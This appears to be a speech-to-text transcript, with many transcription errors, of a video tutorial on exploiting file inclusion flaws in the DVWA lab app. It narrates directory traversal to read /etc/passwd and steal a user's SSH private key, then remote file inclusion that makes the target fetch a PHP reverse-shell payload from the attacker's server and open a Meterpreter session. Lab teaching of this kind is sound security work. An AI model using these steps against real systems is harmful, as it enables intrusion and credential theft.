So here we are on D V W A here's an apple Isar. So I know it's a boon to which means it's Lennox, which means if I look for the etc. Password file, it will work. I'm looking for a windows file. It won't work because this is not a Windows box. Also we're looking at PHP and we're on Apache 2.2 point eight.
And I also know the version of PHP here.
So I can see this page parameter is including this include PHP
with Delphi the dot dot slash matters because if I do this and it says etc, password,
this might not work. So it really depends how far I go back. So you can just keep doing this manually
again, this might take a long time depending on how far back we go and how
how the PHP has written.
So now we see the etc. Password file. So I'll view source and see how much nicer that is than um in the slide.
the users, I see MSF admin
and because I know how uh Lennox is structured and I'm looking at the MSF admin user
but I'm gonna attack on at the end here
sort of etc. Password
is home MSF admin, which is that user 1000
dot S S H I D R esa.
If they have their chemists configured, I should be able to read it
and I can see here that it is mis configured
and I am I am able to view it. So now what do you do?
So again, I view Source, I grabbed this key
and what I'm gonna do
is that I'm going to make my own key. MSF admin,
I'm going to paste that private key information into here.
Going to exit out of this. And you have to charm a this to you can do 400
And now what I should be able to do is ssh.
MSF admin. And then give it on that boxes. MSF admin, which I did. So
now I'm on the box because I use elephant to grab the ssh key.
So let's exit out of here
and let me show you what happens with our if I remote file inclusion. Now
Remember I need to be able to see if it can reach out to my server. So NLVP 4444
and I'll go back and I'm going to change this
To my server. HDP 19216812- 8.4444.
And I see here that the connection was received, it's not looking for any file in particular so I can name my file whatever I want to.
I'm going to kill the connection here.
And what I'm gonna do is I'm going to create that shell dot txt file
Now you'll notice the payloads, PHP interpreter, reverse TCP with my host as well as the L host and my L port is 4444
And we're gonna make this into this TxT file.
Like I said sometimes when you make it a PHP file, it will execute on your own server. And you're like, oh, this looks awfully familiar. Well that's because it's your own server.
So the other thing to do is we want to set up uh met despite.
So you know, I like to execute things directly from the terminal here
before actually loading municipal the municipal a framework
so I should have everything set up and ready to go.
So what I'll do now is I need to set up a server on my own machine.
So I'm gonna use python three
8000. Because that's where our servers running on 48,000
All right. That's on 48,000. That's why I chose that. And you can see that interpreter session is opened.
And I see there it is. So, if I interact with it, session one Sys info.
I see I'm on my display table here.
So that's how to leverage both. L if I to find valuable information in this case an ssh key where we can ssh onto this machine
or r. F. I where we can host our own file and have the server reach out and execute our shell so that now we're on the box here.
So those are file inclusion vulnerabilities, and that's how to exploit them.